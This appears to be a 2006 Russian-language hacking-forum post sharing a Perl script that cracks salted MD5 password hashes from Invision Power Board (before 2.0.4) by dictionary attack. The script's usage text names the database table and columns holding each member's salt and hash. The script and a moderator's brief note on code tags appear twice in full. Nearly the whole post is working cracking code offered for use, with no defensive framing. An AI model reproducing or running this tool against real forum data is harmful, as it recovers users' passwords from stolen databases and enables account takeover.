Grrl
05.01.2006, 04:54
вот есть такая байда на перле для взлома соленых хэшей по словарю от IPB
#!/usr/bin/perl -w
# Functional style
use Digest::MD5 qw(md5_hex);
$SIG{'INT'} = 'CLEANUP';
if (@ARGV < 4) { &usage; }
$salt = $ARGV[0];
$pass_hash = $ARGV[1];
$wordlist = $ARGV[2];
$statename = $ARGV[3];
$output = $statename . "_output.txt";
$salt_hash = md5_hex($salt);
open(INDICT, $wordlist) or die "Can't read " . $wordlist . "\n";
print "\nCTRL+C to save state\n\nRunning...\n";
print "Reading " . $wordlist . " into memory..\n";
@lines = <INDICT>;
print "\n Attempting to crack password..\n";
my $array_element;
foreach $array_element(@lines)
{
$line = $array_element;
chomp $line;
$cpass = md5_hex($line);
$hybridhash = $salt_hash . $cpass;
$current_hash = md5_hex($hybridhash);
if ($current_hash eq $pass_hash)
{
open(PASS_FOUND,">> $output") or die "Can't write to " . $output . "\n";
print PASS_FOUND "---START---\nPassword acquired for " . $cpass . ":\n" . $line . "\n----END----\n";
close PASS_FOUND;
print "---PASSWORD FOUND FOR HASH---\n" . $pass_hash . "\n" . $line . "\n";
exit();
} #end If
} #End While
close INDICT;
sub usage()
{
print q(
Invision Power Board v < 2.0.4 pass_hash Cracker
----------------------------------------------------
USAGE:
~~~~~~
ipb_cracker.pl [PSALT] [PHASH] [WLIST] [SNAME]
[PSALT] - Salt for the password
[PHASH] - Password Hash
[WLIST] - Wordlist file to use
[SNAME] - Name for this attempt
Note:
PSALT & PHASH can be found in:
TABLE -ibf_members_converge
ROWS |- converge_pass_salt
|- converge_pass_hash
e.g. ipb_cracker.pl Kl2op c6d6bd7ebf80f20f6f4db words.txt n0oBXpLoit3r
----------------------------------------------------
);
exit();
}
sub CLEANUP {
print "\n\nCaught Interrupt (^C), Aborting\n";
exit(1);
}
Добавлено qBiN'ом:
В следущий раз постим скрипты в тегах если нужна подсветка то в
#!/usr/bin/perl -w
# Functional style
use Digest::MD5 qw(md5_hex);
$SIG{'INT'} = 'CLEANUP';
if (@ARGV < 4) { &usage; }
$salt = $ARGV[0];
$pass_hash = $ARGV[1];
$wordlist = $ARGV[2];
$statename = $ARGV[3];
$output = $statename . "_output.txt";
$salt_hash = md5_hex($salt);
open(INDICT, $wordlist) or die "Can't read " . $wordlist . "\n";
print "\nCTRL+C to save state\n\nRunning...\n";
print "Reading " . $wordlist . " into memory..\n";
@lines = <INDICT>;
print "\n Attempting to crack password..\n";
my $array_element;
foreach $array_element(@lines)
{
$line = $array_element;
chomp $line;
$cpass = md5_hex($line);
$hybridhash = $salt_hash . $cpass;
$current_hash = md5_hex($hybridhash);
if ($current_hash eq $pass_hash)
{
open(PASS_FOUND,">> $output") or die "Can't write to " . $output . "\n";
print PASS_FOUND "---START---\nPassword acquired for " . $cpass . ":\n" . $line . "\n----END----\n";
close PASS_FOUND;
print "---PASSWORD FOUND FOR HASH---\n" . $pass_hash . "\n" . $line . "\n";
exit();
} #end If
} #End While
close INDICT;
sub usage()
{
print q(
Invision Power Board v < 2.0.4 pass_hash Cracker
----------------------------------------------------
USAGE:
~~~~~~
ipb_cracker.pl [PSALT] [PHASH] [WLIST] [SNAME]
[PSALT] - Salt for the password
[PHASH] - Password Hash
[WLIST] - Wordlist file to use
[SNAME] - Name for this attempt
Note:
PSALT & PHASH can be found in:
TABLE -ibf_members_converge
ROWS |- converge_pass_salt
|- converge_pass_hash
e.g. ipb_cracker.pl Kl2op c6d6bd7ebf80f20f6f4db words.txt n0oBXpLoit3r
----------------------------------------------------
);
exit();
}
sub CLEANUP {
print "\n\nCaught Interrupt (^C), Aborting\n";
exit(1);
}
Добавлено qBiN'ом:
В следущий раз постим скрипты в тегах если нужна подсветка то в